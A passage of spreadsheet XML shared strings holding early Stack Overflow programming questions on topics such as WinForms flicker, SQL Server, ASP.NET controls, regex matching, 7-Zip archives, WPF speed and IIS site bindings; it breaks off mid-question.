    <t xml:space="preserve">&lt;p&gt;So the &lt;a href="http://stackoverflow.com/questions/214215/user-drawn-controls-are-using-the-previous-forms-background"&gt;transparent background problem&lt;/a&gt; is solved.  Now, every time I show the form (or have to have it repainted), I get a lot of flickering.  Is there any way I can not update the screen until the paint event is complete, or any other way to stop the 1/2 second of flickering and flashing while all the objects are being painted?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ANSWER&lt;/strong&gt;: Double buffering is the way to go.  I was already double buffering on the control, but it has to be set on the form.  I though double buffering only worked when you were subclassing OnPaint yourself.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Practical limit for the number of databases in SQL Server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In one of the stackoverflow podcasts (#18 I think) Jeff and Joel were talking about multi vs single tenant databases. Joel mentioned that "FogBugz on Demand" used a database per customer architecture and I was wondering if there is a point beyond which you'll need to have multiple database servers to distribute the load?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>As a C# developer who wants to do some PHP work, what [book/online articles] should I [buy/read] to introduce myself to PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got the bare minimum to handle the Linux/MySQL parts of the stack, but I want to have a basic grasp of PHP before I dive in.  I'll be working on WordPress plugins, in case there's anything specifically interesting for that.&lt;/p&gt;
&lt;p&gt;PS - any recommendations regarding recommended source control/IDEs would also be great, but I guess that's a separate question.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the proper way to maintain state in a custom server control?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This works, but is it the proper way to do it???&lt;/p&gt;
&lt;p&gt;I have a custom server control that has an [input] box on it.  I want it to kinda mimic the ASP.NET TextBox, but not completely.  When the textbox is rendered i have a javascript that allows users to select values that are then placed in that input box.&lt;/p&gt;
&lt;p&gt;I have a public text property on the control.  In the get/set i get/set the viewstate for the control - that part is easy, but when the control is populated via the javascript, the Text get is not actually called, what is the proper way to set this exposed property using JavaScript (or even if the user just types in the box) ?&lt;/p&gt;
&lt;p&gt;Edit:
In the OnInit i ensure the state is maintained by reaching into the form values.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    protected override void OnInit(EventArgs e)
    {
        base.OnInit(e);
        if (HttpContext.Current.Request.Form["MyInputBoxValue"] != "")
        {
            ViewState["MyInputBoxValue"] 
               = HttpContext.Current.Request.Form["MyInputBoxValue"];
        }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then to get the value actually back in place in the HtmlTextWrite, i do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected override void RenderContents(HtmlTextWriter output)
{
        // There is an input control here and i set its value property
        // like this using the Text internal defined.
        output.Write("&amp;lt;input value=" + Text + "&amp;gt;.....
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does anyone know the language used to code Orkut?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For sure this question will not help anyone in a heavy way, but it can be useful somehow. In the beginning, all &lt;strong&gt;Orkut&lt;/strong&gt; pages had the extension &lt;code&gt;*.aspx&lt;/code&gt;, but now all pages are &lt;strong&gt;masqueraded&lt;/strong&gt; under a &lt;code&gt;Main#page.aspx&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Sorry if this &lt;code&gt;Main#&lt;/code&gt; is an ASP feature, but it does not look like one to me. Does anyone know the language Orkut was coded in? (I meant the language behind the "Main#")&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tibco &amp; Windows Process Activation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm thinking about how I could scale out Tibco EMS queue listeners written in managed code (C# in this instance). I'm looking for predominantly isolation and clustering characteristics.&lt;/p&gt;
&lt;p&gt;In MSMQ I could use Windows Process Activation Service to host and manage the number and lifetime of queue listeners.  Is there a Tibco equivalent?&lt;/p&gt;
&lt;p&gt;Otherwise I suspect I'll end up with a simple NT service to host EMS listeners. (which in turn could perform process-activation).   Workable but fairly tricky to build a 24x7 monitorable, robust, production service.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Word macro error messages</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am changing document template macros. The one thing I can't find out how to do is to customize error messages. For example an error message in a document is&lt;/p&gt;
&lt;p&gt;"Error! No table of figures entries found"&lt;/p&gt;
&lt;p&gt;I would like to change this to display something else. Is it possible to do this with Word VBA or VBScript?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to share custom data between iPhone applications?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I make two iPhone applications, how can/should I share custom data (not contacts and stuff like that) among them?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a webservice available for checking a person's credit score?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing an application that should automatically check a person's credit score and present him different payment options based on that score.&lt;/p&gt;
&lt;p&gt;The closest I could find is &lt;a href="http://www.google.com/url?sa=t&amp;amp;source=web&amp;amp;ct=res&amp;amp;cd=1&amp;amp;url=http%3A%2F%2Fwww.strikeiron.com%2FCorteraCreditPulse&amp;amp;ei=Nlv9SNfHGJGUsAP6ovE0&amp;amp;usg=AFQjCNGC4y9x0sY1pW7xu-htXTDcsR9IMA&amp;amp;sig2=1H8S469j2BBpzT2jj7GkHA"&gt;Cortera Credit Pulse&lt;/a&gt; but it's meant for checking a business' credit score and not an indivdual's.&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I add a new replicated table to a SQL Server 2005 DB that is in merge replication?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have merge replication set up over a distributed environment (50 to 1500km between offices) for a SQL Server 2005 database of about 350Gb.  We now need to add a couple of new tables that must also be in replication, but without pushing the new snapshot to all the subscribers.  Is this possible, and if so, what would be the best way to go about doing this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Record level permissions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;p&gt;In a database I am designing I have implemented profile based object level security.
&lt;p&gt;Each user can view, edit, insert, update database tables according to the profiles (roles) he is a member of.
&lt;p&gt;Now there is a need to implement "External Users" who can view only the relevant records and edit some of them (but not the bulk of the database).&lt;/p&gt;
&lt;p&gt;&lt;p&gt;I am working on an "record ownership" model.
&lt;p&gt;Are there any ideas on how to restrict the users belonging to an "External Users" profile to see and work with some records of each table, but not all.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC ready for business applications (integrating 3rd party controls/components)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My company has developed (and still continues to develope) a large ASP.NET business application. Our platform is ASP.NET 2.0 using some ASP.NET Ajax. We're &lt;strong&gt;extensively using third-party components&lt;/strong&gt;, like webgrids, comboboxes, treeviews, calendar and scheduling controls etc.&lt;/p&gt;
&lt;p&gt;Now, I don't know a lot of ASP.NET MVC and I'd like to know if there &lt;strong&gt;is a way to use these third-party-controls in the ASP.NET MVC model&lt;/strong&gt;. Or do vendors have to rewrite their products in order to make them suitable for ASP.NET MVC?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are TIOCM_OUT1 and TIOCM_OUT2 good for?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;code&gt;termios.h&lt;/code&gt; defines:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#define TIOCM_OUT1      0x2000
#define TIOCM_OUT2      0x4000
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But what are the flags good for?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Private function in Fortran</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I declare a private function in Fortran?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reducing coding standards 'brainwashing' duration and effort of new hires</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;At my current job we're pretty strict about code quality and coding standards. All new hires go through a 'brainwashing' period in which time senior developers coach them to write (hopefully) better code.&lt;/p&gt;
&lt;p&gt;The code review process is meticulous and it normally halves the productivity of the developers doing the review. And sometimes the 'brainwashing' period drags on for 2 or 3 months. Sometimes corrections are subtle (e.g. structuring an IF statement so that it short circuits as early as possible) and sometimes you can't help but to raise an eyebrow (e.g. declare a string and set it to String.Empty and on the very next line assign it another value).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;I'm looking for suggestions to reduce the time and effort to get new hires assimilated to coding standards of the team.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;What are others doing in similar circumstances? What processes or tools are you guys using? Is there a way to automate this? I've considered &lt;em&gt;FxCop&lt;/em&gt; but haven't actually tried it and don't know if it would really help reduce time and effort or if it is even the right tool? For logistical reasons we can't do &lt;em&gt;pair programming&lt;/em&gt; if that was a suggestion. And I would be dubious about it reducing the effort.&lt;/p&gt;
&lt;p&gt;We have tried maintaining an in-house wiki of 'corrections' but that is failing dismally. Lack of enforcement and also because it's easier to 'have someone correct your mistakes' rather then 'read up and try and prevent the mistakes'.&lt;/p&gt;
&lt;p&gt;Also, how are you guys drilling it into new hires that code quality is important? And do you guys weed out those who are lackadaisical towards quality at the interview or do you try to change them after they're hired?&lt;/p&gt;
&lt;p&gt;Many thanks.&lt;/p&gt;
&lt;p&gt;EDIT: Thanks for all the answers. Not sure if there is a correct answer for this question but I'm going to mark as correct the one that I'll definitely be trying out.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the benefits of MS Word content controls?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Office 2007 brings a new goodie called as 'content controls'.
I need to evaluate this to see if this serves as a solution for a problem under research.&lt;/p&gt;
&lt;p&gt;Due to paucity of time and my general disdain for Office-interop-pains, &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;can someone summarize the benefits?&lt;/li&gt;
&lt;li&gt;Is it possible to define custom content controls?&lt;/li&gt;
&lt;li&gt;where do all the word programmers (if there are any) hang out :) ? &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;RTFMsdn links also welcome.&lt;/p&gt;
&lt;p&gt;So far I see (from some screencasts) that its now possible to define 
- template word docs whose content can be stubbed in from a data-behind-XML. You could create this XML as you wish.. e.g. translate contents of your DB into an XML form. The word doc can now 'data-bind' to this XML.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What code highlighting libs are there for Ruby?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What'd also interest me is which have more or less dependencies.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Standard File Naming Conventions in Ruby</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For a file containing the given class, SomeCoolClass, what would be the proper or standard filename?&lt;/p&gt;
&lt;pre&gt;
 1. somecoolclass.rb
 2. some_cool_class.rb
 3. some-cool-class.rb
 4. SomeCoolClass.rb
&lt;/pre&gt;
&lt;p&gt;or some other variation?&lt;/p&gt;
&lt;p&gt;I noticed in the Ruby stdlib, versions 1, 2 and 3 are used.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Easy way to flatten XML file with LINQ</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there an easy way with LINQ to flatten an XML file?&lt;/p&gt;
&lt;p&gt;I can see a number of ways with XSLT but wondered what the best option with LINQ would be?&lt;/p&gt;
&lt;p&gt;I cant put the xml structure up exactly as stackoverflow seems to filter chevron chars. But its something like this &lt;/p&gt;
&lt;p&gt;nodeA &lt;/p&gt;
&lt;p&gt;--nodeA1 &lt;/p&gt;
&lt;p&gt;--nodeA2 &lt;/p&gt;
&lt;p&gt;NodeB &lt;/p&gt;
&lt;p&gt;I want to end up with &lt;/p&gt;
&lt;p&gt;nodeA &lt;/p&gt;
&lt;p&gt;nodeA1&lt;/p&gt;
&lt;p&gt;nodeA2 &lt;/p&gt;
&lt;p&gt;NodeB&lt;/p&gt;
</t>
  </si>
  <si>
    <t>remotely and programatically logoff an active domain user</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to be able to logoff any user from his windows session from a program. &lt;/p&gt;
&lt;p&gt;I know I could log in as an admin and force a remote logoff. Is there any other way to force a logoff without logging in? &lt;/p&gt;
&lt;p&gt;The tool will run as admin so that's not a problem, being able to remote logoff without logging in is.&lt;/p&gt;
&lt;p&gt;Tool is in .NET, but any other way is welcome (JScript, command line tool to run from PInvoke, etc.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Raise CellValueChanged from a custom editing control in a DataGridView</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a DataGridView (WinForms) in which I have defined a custom EditingControl derived from DataGridViewTextBoxEditingControl that only allows numeric characters.&lt;/p&gt;
&lt;p&gt;I need to raise CellValueChanged event on the DataGridView each time the user press a key, but the default behaviour is to raise the event only when edition has been completed.&lt;/p&gt;
&lt;p&gt;How can I raise the event each time a key is pressed?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class DataGridViewNumericTextBoxEditingControl : DataGridViewTextBoxEditingControl
{
    protected override void OnKeyPress(KeyPressEventArgs e)
    {
        e.Handled = Char.IsLetter(e.KeyChar);
        if (!e.Handled)
            RaiseDataGridViewCellValueChanged(); // &amp;lt;-- Any way?
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I've found a workaround, but I'm not sure it's a good solution:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class DataGridViewNumericTextBoxEditingControl : DataGridViewTextBoxEditingControl
{
    protected override void OnKeyPress(KeyPressEventArgs e)
    {
        e.Handled = Char.IsLetter(e.KeyChar);
        if (!e.Handled)
        {
            EditingControlDataGridView.EndEdit();
            EditingControlDataGridView.BeginEdit(false);
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Why ^*$ matches "127.0.0.1"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't understand, why does the following regular expression:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;^*$
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Match the string "127.0.0.1"? Using &lt;code&gt;Regex.IsMatch("127.0.0.1", "^*$");&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Using Expresso, it does not match, which is also what I would expect. Using the expression &lt;code&gt;^.*$&lt;/code&gt; does match the string, which I would also expect.&lt;/p&gt;
&lt;p&gt;Technically, &lt;code&gt;^*$&lt;/code&gt; should match the beginning of a string/line any number of times, followed by the ending of the string/line. It seems * is implicitly treated as a &lt;code&gt;.*&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;What am I missing?&lt;/p&gt;
&lt;p&gt;EDIT:
Run the following to see an example of the problem.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
using System.Text.RegularExpressions;
namespace RegexFubar
{
    class Program
    {
    	static void Main(string[] args)
    	{
    		Console.WriteLine(Regex.IsMatch("127.0.0.1", "^*$"));
    		Console.Read();
    	}
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I do not wish to have ^*$ match my string, I am wondering why it &lt;strong&gt;does&lt;/strong&gt; match it. I would think that the expression should result in an exception being thrown, or at least a non-match.&lt;/p&gt;
&lt;p&gt;EDIT2:
To clear up any confusion. I did not write this regex with the intention of having it match "127.0.0.1". A user of our application entered the expression and wondered why it matched the string when it should not. After looking at it, I could not come up with an explanation for why it matched - especially not since Expresso and .NET seems to handle it differently.&lt;/p&gt;
&lt;p&gt;I guess the question is answered by it being due to the .NET implementation avoiding throwing an exception, even thought it's technically an incorrect expression. But is this really what we want?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# Generics/Design Patterns: Should I use the template method?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Scenario:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;(If anyone has answered/viewed my questions recently this will be somewhat familar)&lt;/p&gt;
&lt;p&gt;I have 3 different web services which expose a set of objects that have commonality. I've written wrapper classes and conversion logic using generic methods to change between the intermediary objects and the service object. &lt;/p&gt;
&lt;p&gt;I have an interface for the Webservice, let it be called IService for the purpose of this question. I have 3 implementation classes Service1Impl, Service2Impl and Service3Impl. Each of these referencing a different web service and using my aforementioned generic methods to convert between the appropriate objects.&lt;/p&gt;
&lt;p&gt;These are injected into my ServiceWrapper class at runtime via the constructor (a factory is used to create the appopriate implementation of the ISerivice&lt;/p&gt;
&lt;p&gt;e.g: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;_service = ServiceWrapper.GetServiceWrapper("2");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Will give me a ServiceWrapper instantiated with the Service2Impl.&lt;/p&gt;
&lt;p&gt;(Dammit diagrams would be hella useful!)&lt;/p&gt;
&lt;p&gt;Ok so each implementation of IService has a method called for arguments sake.. GetProperties: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public IProperty[] GetProperties(string item, IProperty[] properties)
{
    Property[] props = ServiceObjectFactory.CreateProperties&amp;lt;Property&amp;gt;(properties);
    Property[] result = _service.GetProperties(item, props);
    return ServiceObjectFactory.CreateProperties(result);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This looks a little confusing (I think I'm going to refactor the names). &lt;/p&gt;
&lt;p&gt;Basically what is happening is:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;The call to this function from ServiceWrapper is made with the intermediary objects (IProperty) (as you can see from the parameters).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The intermediary objects are converted to Property objects which are service specific.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The result comes back as service specific Property objects.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The result is converted to the intermediary objects before being passed back to the ServiceWrapper.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Now, this code is going to be exactly the same for Service1Impl, Service2Impl and Service3Impl. Except of course that the types used are different.&lt;/p&gt;
&lt;p&gt;Can anyone think of a way to do this so that I don't have the same code 3 times? &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;N.B: This is not true of every method in each Implementation. Just most of them.&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What code highlighting libs are there for Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like them to be easy to bundle, with few dependencies and easy to use.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best ways to deal with UTC and daylight saving times</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the best ways of dealing with UTC Conversion and daylight saving times conversion. What are the problems and their solutions. All in C# .Net 2.0. Also any existing problems with this in .Net 2.0.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there any good Javascript graphics libraries?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After staring at &lt;a href="http://maettig.com/code/javascript/3d_dots.html"&gt;this 3D cube&lt;/a&gt; and &lt;a href="http://www.uselesspickles.com/triangles/demo.html"&gt;these triangles&lt;/a&gt; for a while I started wondering if there's any good reliable Javascript graphics library with basic 3D support.&lt;/p&gt;
&lt;p&gt;Any suggestion?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Bat file to run a .exe at the command prompt</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to create a .bat file so I can just click on it so it can run:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;svcutil.exe /language:cs /out:generatedProxy.cs /config:app.config http://localhost:8000/ServiceModelSamples/service
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can someone help me with the structure of the .bat file?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MSBuild, example that filters entire solution of .cs files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to learn MSBuild, was wondering if someone could get me started with a simple build script to filter out my vs.net 2008 project of all files with the .cs extension.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;how do I run the build?&lt;/li&gt;
&lt;li&gt;where do you usually store the build also?&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Set BufferedImage alpha mask in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two BufferedImages I loaded in from pngs. The first contains an image, the second an alpha mask for the image.&lt;/p&gt;
&lt;p&gt;I want to create a combined image from the two, by applying the alpha mask. My google-fu fails me.&lt;/p&gt;
&lt;p&gt;I know how to load/save the images, I just need the bit where I go from two BufferedImages to one BufferedImage with the right alpha channel.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I stop ASP.NET Menu controls from generating inline html style elements</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a master page that contains an ASP.NET server side Menu control (System.Web.UI.WebControls.Menu)&lt;/p&gt;
&lt;p&gt;I &lt;em&gt;am&lt;/em&gt; using the CSSFriendly adapters from here&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.asp.net/CSSAdapters/Menu.aspx"&gt;http://www.asp.net/CSSAdapters/Menu.aspx&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;and they do make the rendered HTML much cleaner however I am still getting inline styles output into the HEAD element in the HTML like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;style type="text/css"&amp;gt;
    .ctl00_SiteHeader1_TabBar1_Menu1_0 { background-color:white;visibility:hidden;display:none;position:absolute;left:0px;top:0px; }
    .ctl00_SiteHeader1_TabBar1_Menu1_1 { text-decoration:none; }
    .ctl00_SiteHeader1_TabBar1_Menu1_2 {  }
    .ctl00_LeftColumnContent_LeftHandNavigator1_Menu1_0 { text-decoration:none; }
&amp;lt;/style&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I thik these styles are being generated by ASP.NET, I don't think I need them as I am using the CSSAdapters so is there any way of stopping them from being generated?&lt;/p&gt;
&lt;p&gt;Derek&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Operations on arbitrary value types</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This &lt;a href="http://themechanicalbride.blogspot.com/2008/04/using-operators-with-generics.html" rel="nofollow"&gt;article&lt;/a&gt; describes a way, in C#, to allow the addition of arbitrary value types which have a + operator defined for them. In essence it allows the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public T Add(T val1, T val2)
{
   return val1 + val2;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code does not compile as there is no guarantee that the T type has a definition for the '+' operator, but the effect is achieved with code like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public T Add(T val1, T val2)
{
   //Num&amp;lt;T&amp;gt; defines a '+' operation which returns a value of type T
   return (new Num&amp;lt;T&amp;gt;(val1) + new Num&amp;lt;T&amp;gt;(val2));
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Follow the link to see how the Num class achieves this. Anyways, on to the question. Is there any way to achieve the same effect in C or C++? For the curious, the problem I'm trying to solve is to allow a CUDA kernel to be more flexible/general by allowing it to operate on more types.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; For .NET, Marc Gravell has made a &lt;a href="http://www.yoda.arachsys.com/csharp/miscutil/usage/genericoperators.html" rel="nofollow"&gt;utility library&lt;/a&gt; which solves the operator problem very elegantly.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I create 7-Zip archives with .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I create 7-Zip archives from my C# console application? I need to be able to extract the archives using the regular, widely available &lt;a href="http://www.7-zip.org/"&gt;7-Zip&lt;/a&gt; program.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h2&gt;Here are my results with the examples provided as answers to this question&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;"Shelling out" to 7z.exe - this is the simplest and most effective approach, and I can confirm that &lt;strong&gt;it works nicely&lt;/strong&gt;. As &lt;a href="http://stackoverflow.com/questions/222030/how-do-i-create-7-zip-archives-with-net#222047"&gt;workmad3 mentions&lt;/a&gt;, I just need to guarantee that 7z.exe is installed on all target machines, which is something I can guarantee.&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.eggheadcafe.com/tutorials/aspnet/064b41e4-60bc-4d35-9136-368603bcc27a/7zip-lzma-inmemory-com.aspx"&gt;7Zip in memory compression&lt;/a&gt; - this refers to compressing cookies "in-memory" before sending to the client; this method seems somewhat promising. The wrapper methods (wrapping the &lt;a href="http://www.7-zip.org/sdk.html"&gt;LZMA SDK&lt;/a&gt;) return type &lt;code&gt;byte[]&lt;/code&gt;. When I write the &lt;code&gt;byte[]&lt;/code&gt; array to a file, I can't extract it using 7-Zip (&lt;code&gt;File.7z is not supported archive&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.codeplex.com/7zsharp"&gt;7zSharp&lt;/a&gt; Wrapper (found on CodePlex) - this wraps the 7z exe/&lt;a href="http://www.7-zip.org/sdk.html"&gt;LZMA SDK&lt;/a&gt;. I referenced the project from my app, and it successfully created some archive files, but I was unable to extract the files using the regular 7-Zip program (&lt;code&gt;File.7z is not supported archive&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.7-zip.org/sdk.html"&gt;7Zip SDK aka LZMA SDK&lt;/a&gt; - I guess I'm not smart enough to figure out how to use this (which is why I posted here)... Any working code examples that demonstrate creating a 7zip archive that is able to be extracted by the regular 7zip program?&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.codeproject.com/KB/DLL/cs_interface_7zip.aspx"&gt;CodeProject C# (.NET) Interface for 7-Zip Archive DLLs&lt;/a&gt; - only supports extracting from 7zip archives... I need to create them!&lt;/li&gt;
&lt;li&gt;&lt;a href="http://sharpdevelop.net/OpenSource/SharpZipLib/Default.aspx"&gt;SharpZipLib&lt;/a&gt; - According to their &lt;a href="http://wiki.sharpdevelop.net/SharpZipLib_FAQ.ashx"&gt;FAQ&lt;/a&gt;, SharpZipLib doesn't support 7zip.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Tab Controls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently attempting to create a tabbed interface in a web application, and based on my search, there aren't any 'built in' tab controls in ASP.NET.  There are some in the &lt;a href="http://www.asp.net/ajax/" rel="nofollow"&gt;ASP.NET AJAX&lt;/a&gt; downloadable toolkit, as well as a wealth of 'pay for use' third party Tab Controls.&lt;/p&gt;
&lt;p&gt;My question is:  What Tab control have you used for ASP.NET applications, and why do you use it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to speed up WPF programs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I love programming with and for Windows Presentation Framework. Mostly I write browser-like apps using WPF and XAML.&lt;/p&gt;
&lt;p&gt;But what really annoys me is the slowness of WPF. A simple page with only a few controls loads fast enough, but as soon as a page is a teeny weeny bit more complex, like containing a lot of data entry fields, one or two tab controls, and stuff, it gets painful.&lt;/p&gt;
&lt;p&gt;Loading of such a page can take more than one second. Seconds, indeed, especially on not so fast computers (read: the customers computers) it can take ages.&lt;/p&gt;
&lt;p&gt;Same with changing values on the page. Everything about the WPF UI is somehow sluggy.&lt;/p&gt;
&lt;p&gt;This is so mean! They give me this beautiful framework, but make it so excruciatingly slow so I'll have to apologize to our customers all the time!&lt;/p&gt;
&lt;p&gt;My Question: &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;How do you speed up WPF?&lt;/li&gt;
&lt;li&gt;How do you profile bottlenecks?&lt;/li&gt;
&lt;li&gt;How do you deal with the slowness?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Since this seems to be an universal problem with WPF, I'm looking for general advice, useful for many situations and problems.&lt;/p&gt;
&lt;p&gt;Some other related questions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/38642/what-tools-do-you-use-for-wpf-development"&gt;What tools do you use for WPF development&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/189244/tools-to-develop-wpf-or-silverlight-applications"&gt;Tools to develop WPF or Silverlight applications&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How do I force a rollover at application startup with Log4net RolloverFileAppender?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Have Log4Net configured in our application to use a date stamped name and a 10Meg file size limit.&lt;br /&gt;
This automatically causes a rollover to a new file at midnight and whenever the 10Meg limit is reached.
I would also like to roll over the logging to a new file each time the application is started (or closed).&lt;br /&gt;
Can I get all three roll over behaviours?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In PHP, how can I correct missing keys in an array?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After using &lt;a href="http://us.php.net/array_unique"&gt;&lt;code&gt;array_unique&lt;/code&gt;&lt;/a&gt;, an array without the duplicate values is removed. However, it appears that the keys are also removed, which leaves gaps in an array with numerical indexes (although is fine for an associative array). If I iterate using a for loop, I have to account for the missing indexes and just copy the keys to a new array, but that seems clumsy.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IIS 7.0 Multiple Domain Site Bindings</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got three web sites each with its own domain going to my one Windows Server 2008 IIS 7.0 web server.&lt;/p&gt;
&lt;ul&gt;
